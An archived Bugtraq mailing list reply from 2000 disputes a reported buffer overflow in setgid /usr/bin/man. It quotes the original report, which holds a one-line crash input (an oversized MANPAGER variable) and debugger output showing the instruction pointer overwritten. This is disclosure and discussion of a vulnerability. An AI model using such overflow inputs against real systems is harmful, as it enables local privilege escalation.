Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
From: hdm () SECUREAUSTIN COM (H D Moore)
Date: Sun, 27 Feb 2000 23:14:16 -0600


Hi,

I could not reproduce this on a SuSE 6.2 system running:

man, version 2.3.10, db 2.3.1, July 12th, 1995
(G.Wilford () ee surrey ac uk)

My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
in every envrionment variable it uses without it flinching.

Michal Zalewski wrote:

With most of Linux distributions, /usr/bin/man is shipped as setgid man.
This setgid bit is required to build formatted manpages in /var/catman for
faster access. Unfortunately, man does almost everything via system()
calls, where parameters are user-dependent, and almost always it's
sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
privledges, using buffer overflows in enviromental variables. For example,
by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get
SEGV:

$ MANPAGER=`perl -e '{print "A"x4000}'` man ls

[...]

1200  setuid(500)                       = 0
1200  setgid(15)                        = 0
1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  
open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  close(-1)   
                      = -1 EBADF (Bad file descriptor)
1200  write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200  --- SIGSEGV (Naruszenie ochrony pamiêci) ---
1200  +++ killed by SIGSEGV +++

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]